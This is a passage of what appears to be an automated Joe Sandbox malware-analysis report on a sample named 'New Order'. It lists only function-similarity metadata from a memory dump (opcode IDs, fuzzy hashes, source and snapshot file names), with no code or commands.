                                                                                                                              • Opcode ID: 9b5834e02bad60bd7d35495a9dbfaca33ea9b8d43edd4031db55d480b098443e
                                                                                                                              • Instruction ID: 228bdd59d62d5c19eac54947c63d122cd11ee9a1df71b693dc136d69bcfc7cbf
                                                                                                                              • Opcode Fuzzy Hash: 9b5834e02bad60bd7d35495a9dbfaca33ea9b8d43edd4031db55d480b098443e
                                                                                                                              • Instruction Fuzzy Hash: 43910432A00616CFEB269B5CC480BB9BBAAEF94718F154169ED06DB288F634DB41C751
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dce207bb93221dc039930698f0b0765a5502aed498db0af3a2f7b2b7e3a929b4
                                                                                                                              • Instruction ID: 3edc3101fe2482ed4e3882662e84f3dacb0c79eff4fc0eec1d650aad1eca6bbc
                                                                                                                              • Opcode Fuzzy Hash: dce207bb93221dc039930698f0b0765a5502aed498db0af3a2f7b2b7e3a929b4
                                                                                                                              • Instruction Fuzzy Hash: 01819471E0061A9BDB68CF69C940ABEBBF9FB48710F54852EE845D7640F734DA40CBA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction ID: 5d3ff4bd6297fd3c4caba944c55ae4d3998aa7c5ff0ffe2340f29ba057f41e50
                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction Fuzzy Hash: 48816F31A002099BDF19CF9CC880AAEBBB6EF84714F18856DD916DB345EB34EA01CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9fede5fb65dac9427aaa71d47a430cf12941e324b98de0cfb6e874b58cfc91ed
                                                                                                                              • Instruction ID: 1ac9ebf2d052c6c0bbdec4c3b8c4d6df763b68b71072e104bb3b1cee32d9baae
                                                                                                                              • Opcode Fuzzy Hash: 9fede5fb65dac9427aaa71d47a430cf12941e324b98de0cfb6e874b58cfc91ed
                                                                                                                              • Instruction Fuzzy Hash: F1813271900609AFDB25CFA9C880BDEBBFAFF88354F144429E555E7250D770AE45CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b475ec5285e80d7192bb012154638c954c272a7dea51d7b3a4693dd5016d930
                                                                                                                              • Instruction ID: 04f8af29b3058d90c5e729b8aaedf88b73f524328ce152bbf60d1c6686272e93
                                                                                                                              • Opcode Fuzzy Hash: 4b475ec5285e80d7192bb012154638c954c272a7dea51d7b3a4693dd5016d930
                                                                                                                              • Instruction Fuzzy Hash: EE71CFB5D00229DFCB258F59D890BBEBBB8FF59714F14451AE946EB354E3709A00CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8912b2e06e2b9dfc3a67d0b6bbba0d4e57eb593a23e34e426d7a27c64699272c
                                                                                                                              • Instruction ID: 922fa80c6e3539f9bf442a883013889d4252a17516b3385b50d12ab6e6b46d05
                                                                                                                              • Opcode Fuzzy Hash: 8912b2e06e2b9dfc3a67d0b6bbba0d4e57eb593a23e34e426d7a27c64699272c
                                                                                                                              • Instruction Fuzzy Hash: 64718170900205EFDB20DF69D985E9ABBF9EF90300B24525EE601E739AE7319B40CF55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b48f2c5e565d42a2ecb2c360c0328a60c58605c8a9e4b4252e1f1d47d2a965a8
                                                                                                                              • Instruction ID: 81fa86c00581c2a8cb0344e6b8470701f5b5b2c3f76d21bc924c137bc404cef7
                                                                                                                              • Opcode Fuzzy Hash: b48f2c5e565d42a2ecb2c360c0328a60c58605c8a9e4b4252e1f1d47d2a965a8
                                                                                                                              • Instruction Fuzzy Hash: 2471D5726042428FD316DF2CC480B66B7EAFF84314F1489A9E855CB39ADB34DE45CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction ID: fc107f28ba7421618abfc740d2cae220b48ae92db0a749b6dc4dee115962744b
                                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction Fuzzy Hash: 60715E71A00619EFDB10EFA9C984EDEBBB9FF58710F104569E905E7250DB34EA05CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 38932d225e69147905fad706bd145f350317aa31c8491cf345ab38fc42a84ed0
                                                                                                                              • Instruction ID: 4f405117ba8f4b121e8e49c0dab902d3294433cd30be87069cc9afb90443f892
                                                                                                                              • Opcode Fuzzy Hash: 38932d225e69147905fad706bd145f350317aa31c8491cf345ab38fc42a84ed0
                                                                                                                              • Instruction Fuzzy Hash: E0710532200B05EFEB32DF58C884F56BBA6FF40764F284428E615C76A1EB75EA44DB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1b38299abb2b136b77666f0070646a438a2908e22443bc7e2fd23436da0c9170
                                                                                                                              • Instruction ID: 4aa4ad2b8c1e4bc229889ea7a07ad13ed67c5b30d69af80756624cb794abd632
                                                                                                                              • Opcode Fuzzy Hash: 1b38299abb2b136b77666f0070646a438a2908e22443bc7e2fd23436da0c9170
                                                                                                                              • Instruction Fuzzy Hash: 0581AB72A0470A8FDB25CF9CD984BAEB7B6EB49314F15416ED904EB291C7749F80CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1257699a83f9a8a95044f6d61606a8bb24a7b762b588b0fbc876d09c9829a7a0
                                                                                                                              • Instruction ID: e5550ffd1644c462b7cca9a6d02859c2d38f3f46d16278912052710045c37e3d
                                                                                                                              • Opcode Fuzzy Hash: 1257699a83f9a8a95044f6d61606a8bb24a7b762b588b0fbc876d09c9829a7a0
                                                                                                                              • Instruction Fuzzy Hash: F761A271A002069FDB19EF6CC884BAEB7B5FF49314F14416AE611EB291DB31DA01CF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 636de333609b9a39bbcb935e927d379c2d82b9918dd455c22dfbb2adf90fe02c
                                                                                                                              • Instruction ID: a5f5a51298a40f6a37ebc75cc5e416b7faf5de51ae33ee825a18ea5c5d8fd3b8
                                                                                                                              • Opcode Fuzzy Hash: 636de333609b9a39bbcb935e927d379c2d82b9918dd455c22dfbb2adf90fe02c
                                                                                                                              • Instruction Fuzzy Hash: 3351BF72504716AFD715DE68C8C4E9BBBE8EBC5B54F000929BA40DB250DB74EE04CBA3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8ceb1a43b89131d13378debba2f75862341cdab4c8be83315fcf89b5bd83903b
                                                                                                                              • Instruction ID: 1b5a1b0e946c759d2d3f16c0dc030314ffe6a81e26293927f10ecb0b15abf583
                                                                                                                              • Opcode Fuzzy Hash: 8ceb1a43b89131d13378debba2f75862341cdab4c8be83315fcf89b5bd83903b
                                                                                                                              • Instruction Fuzzy Hash: C351E2726143129FD712CF28C840BAABBE5FF85B54F04892CF985D7290D734EA08CB96
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3e35e52f9eea619e023725f119a3c020943f86a92a135aa683f0f5348d09692
                                                                                                                              • Instruction ID: e4d656d3a6a92d0823a6f111406b613e808e900aa5de9d9c801bc9a01f33780a
                                                                                                                              • Opcode Fuzzy Hash: a3e35e52f9eea619e023725f119a3c020943f86a92a135aa683f0f5348d09692
                                                                                                                              • Instruction Fuzzy Hash: 5C51B170900709DFE721DF5AC880A6BFBF8BF55714F50461EE292D76A1C770A645CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7a79d65552feec4a25bcf26b9c116ce01f5dc7d73d28ace3034aff7b7196ee2a
                                                                                                                              • Instruction ID: 3bd717604c67db393f02ee2e1e71d4e41df1ed753d39f7cb5ddd8f18cfee5c0f
                                                                                                                              • Opcode Fuzzy Hash: 7a79d65552feec4a25bcf26b9c116ce01f5dc7d73d28ace3034aff7b7196ee2a
                                                                                                                              • Instruction Fuzzy Hash: 0E516D72600A09DFCB22EF69C980E6AB3FDFF58754F44046AE551D7260E734EA50CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b6c6f115b5d83d1e241b1b9b5282cbd8eb777631e04c66d4e0292c63877163ad
                                                                                                                              • Instruction ID: aa95a29925505a6121badde1b4e5ccd70fb78d5cf0c32a118955daabc6b3433d
                                                                                                                              • Opcode Fuzzy Hash: b6c6f115b5d83d1e241b1b9b5282cbd8eb777631e04c66d4e0292c63877163ad
                                                                                                                              • Instruction Fuzzy Hash: 0C5147716083469FEB54DF29C880A6BBBE5BFC8308F88492DF595C7250EB70DA05CB52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction ID: d6c1a24cce8f010816571f5bc86138bf31a801a55309653276ac3019abeb39b0
                                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction Fuzzy Hash: 03515E75E0422EAFDB16DF98C440BEEBBB9AF45754F044069EA11EB240D774DE84CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction ID: d2d65fdfcb6dac36c23666b6a5e546dd9ef5046ba45465703b0310c9e7a67fa2
                                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction Fuzzy Hash: 1A51A531D0021EEFEF21BF98C894BAEBB79AB00764F154665E912F7190D7309F408BA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ca6a7e910dca6a27e133687c09e25e304a6391104f19f72c94099075882e49c3
                                                                                                                              • Instruction ID: 87d9bd973b24cc38151c642c7a08758f946846d7451799d1a16128cee71d959a
                                                                                                                              • Opcode Fuzzy Hash: ca6a7e910dca6a27e133687c09e25e304a6391104f19f72c94099075882e49c3
                                                                                                                              • Instruction Fuzzy Hash: 8541D5707816119BE729DB2DC894B7BBB9AEF92B20F04822DF955C7281DB34DB01C791
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e89ffab150bee3d79fad2b9446ff384838808a27745b716ae34b28ba82b9df78
                                                                                                                              • Instruction ID: 15e122f5b8fa6e5c5a5ddfef0dc79d60c59030f3c5ba9c2e15546072a5c63dd0
                                                                                                                              • Opcode Fuzzy Hash: e89ffab150bee3d79fad2b9446ff384838808a27745b716ae34b28ba82b9df78
                                                                                                                              • Instruction Fuzzy Hash: 27515D7690021ADFCB20EFA9C98099EBBB9FF48354B254519D545E7708E734AF01CFA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c00c33b7f5e3feaddd7faea45a75de9825a94d4c168d0905d0ce78d5c1eedff9
                                                                                                                              • Instruction ID: dfb9f7746a7c7f8b378f2597ea61624d4508cb0b6c54b0bb9c21cd12b0c7e71c
                                                                                                                              • Opcode Fuzzy Hash: c00c33b7f5e3feaddd7faea45a75de9825a94d4c168d0905d0ce78d5c1eedff9
                                                                                                                              • Instruction Fuzzy Hash: E1412A75A402059BDB29EF6CD8C1F6A7765AB94708F08002DFE06DB242EB71DB10CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction ID: 288ed2f4ae149c92f6bcb5813f0e2963c7f752bb0c636ddc9c9a3051d11d3d42
                                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction Fuzzy Hash: 2D41E97260171A9FD729CF1CC980A6AB7A9FF80714B05462EE912C7644FB30EE04C7D1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9a646f1fd4a61d202f9329118e43fe79ade0c4f8e72ec18893bb43681874b23c
                                                                                                                              • Instruction ID: c7121d640282225335309f0e21e63dd67d24c3f4492382b8f67300e9add1dc79
                                                                                                                              • Opcode Fuzzy Hash: 9a646f1fd4a61d202f9329118e43fe79ade0c4f8e72ec18893bb43681874b23c
                                                                                                                              • Instruction Fuzzy Hash: 8841BC369002199BDB15DF98C440AEEBBB5BF88714F19826AF819F7340E7349E41CBA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                              • Instruction ID: fe86b6468034a6c5e8c3a97b40280f305d0f75d41528036183ad82566e67bab1
                                                                                                                              • Opcode Fuzzy Hash: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                              • Instruction Fuzzy Hash: A541D2722103059FD725EF6CC880A57B7EAFF98328F10492EE657C7215EB34EA848B55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction ID: 8a1a98a87f62742a445cd2de2ee56e47a41b84a13ee01bc2eac159509957aedd
                                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction Fuzzy Hash: 6B514775A00219DFCB19CF98C480AAEF7B6FF84714F2881A9D915E7351D730EA82CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                              • Instruction ID: 64f1849af70932adb9de2951c4f7dbe30a3552b6a2211e1bc930339b97e3cdc1
                                                                                                                              • Opcode Fuzzy Hash: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                              • Instruction Fuzzy Hash: F451077090020BDBDB66CB28CC00BA8BBB5FF11314F2442A9E525D72C5E7345B91CF45
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0fc248ab343df0457e1ad3ce41ec2b3deb27929d0f65f537e8dd26f80249359c
                                                                                                                              • Instruction ID: 23342c7d8cc3c561609ec7f5432e3ffcada95b74e3aaffb8c5ebf8911554ef0a
                                                                                                                              • Opcode Fuzzy Hash: 0fc248ab343df0457e1ad3ce41ec2b3deb27929d0f65f537e8dd26f80249359c
                                                                                                                              • Instruction Fuzzy Hash: 0D415E35A0022D9BDB62DF6CCD40BEAB7B9EF45750F0100A5E948EB281D6749F84CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction ID: 1a2cc9afc562d1d77fa53d5e7685e7c2e86af7e1f8a6b322ed1d2569f5b4f36b
                                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction Fuzzy Hash: 5E417475B40105ABEB15DB99CC84AAFBBBAAF89B10F14806DE905E7341DB74DF0187A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e555340c50e54e1f280741427bf35962a18c0d0cf10ae35caf4a23ebc36a30f9
                                                                                                                              • Instruction ID: 67eefe80efc6d678fb435df5d096a599b6b21dcf81c307735a24f3339b94ffa8
                                                                                                                              • Opcode Fuzzy Hash: e555340c50e54e1f280741427bf35962a18c0d0cf10ae35caf4a23ebc36a30f9
                                                                                                                              • Instruction Fuzzy Hash: B041B0716007099FE366CF28CC80A22B7F9FF49354B104A6EE547C6A91E730EA45CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5bd890f0b16ae012d5b0b8fcf428d1f23174056b976cb9b7726cfbeb0a56db39
                                                                                                                              • Instruction ID: 209fc46dfbc63ac349f248029ca3aac7736a0d8f5c02b50a1b9cbc66abe802e6
                                                                                                                              • Opcode Fuzzy Hash: 5bd890f0b16ae012d5b0b8fcf428d1f23174056b976cb9b7726cfbeb0a56db39
                                                                                                                              • Instruction Fuzzy Hash: 4741AC32940629CFDB2ADFA8C984BAA7BB5FF14314F14015AE411E7695DB349B80CFA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6815f9a2a3421699daddc72e5676f68b0772c686a3dfe3d3b1eff99088af790a
                                                                                                                              • Instruction ID: 33bc181c7355f7db8eba9d6eb1cec601ed47ca9b93bffae2c25be8163aeecd38
                                                                                                                              • Opcode Fuzzy Hash: 6815f9a2a3421699daddc72e5676f68b0772c686a3dfe3d3b1eff99088af790a
                                                                                                                              • Instruction Fuzzy Hash: 4B41F332D0020ACBD7669F4CC880A6BBBB6FB96704F14812ED905DB295C7359B81CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ba126b95cda2b9e53047e9776a3dcadaca9a90a504e4624abc9c228d1ff54123
                                                                                                                              • Instruction ID: bf89dd628efe969e371c7b67cc2c00dcc1c5997af0a510d44688198bd32b72d6
                                                                                                                              • Opcode Fuzzy Hash: ba126b95cda2b9e53047e9776a3dcadaca9a90a504e4624abc9c228d1ff54123
                                                                                                                              • Instruction Fuzzy Hash: 374128725083169FD312DF698840A6BF7E9EF88B54F40092EFA84D7250E730DE458BA3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
